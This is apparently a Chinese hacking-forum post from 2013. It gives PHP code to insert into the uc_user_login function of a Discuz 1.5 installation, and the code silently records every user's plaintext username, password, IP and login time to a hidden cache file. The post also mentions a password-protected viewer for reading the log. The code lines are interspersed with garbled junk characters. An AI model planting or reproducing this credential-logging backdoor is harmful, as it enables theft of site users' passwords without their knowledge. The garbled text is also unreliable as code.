中国网络渗透测试联盟

标题: dz1.5记录用户名和密码 [打印本页]
作者: admin    时间: 2013-2-27 21:40
标题: dz1.5记录用户名和密码
修改uc_client目录下的client.php 在
3 x* O/ y" J5 k4 p8 A6 m8 }function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
! k0 T0 p; O7 h下加入如上代码,在网站./data/cache/目录下自动生成csslog.php% I7 t, x" Q. l5 v5 n
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw; `; s+ Q1 `0 X" m
if(getenv('HTTP_CLIENT_IP')) { * j0 q- D& c* _' r+ q
$onlineip = getenv('HTTP_CLIENT_IP');
3 \2 D; x7 l8 i8 I! X$ L; {} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
& o7 r  E% F0 I! o$onlineip = getenv('HTTP_X_FORWARDED_FOR');
( k& t. z; }: V  r; N2 z} elseif(getenv('REMOTE_ADDR')) {
5 T$ r& U5 d& S6 ^  {/ C8 r. o$onlineip = getenv('REMOTE_ADDR');
. h/ k4 R3 E$ e! x" e) h  m} else { 3 e7 f$ L: L$ |8 q5 m0 T
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];! Y- z! l5 \& F" R2 z7 O2 ^" o: ^% L
}8 J! K. N- _* M$ o
     $showtime=date("Y-m-d H:i:s");
$ _- N+ `8 V0 }( q, _% H    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
$ |2 `/ e1 A9 \' L7 v. C    $handle=fopen('./data/cache/csslog.php','a+');+ Q; A* h- t3 r) O' d; M9 e0 ]+ E
    $write=fwrite($handle,$record);



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2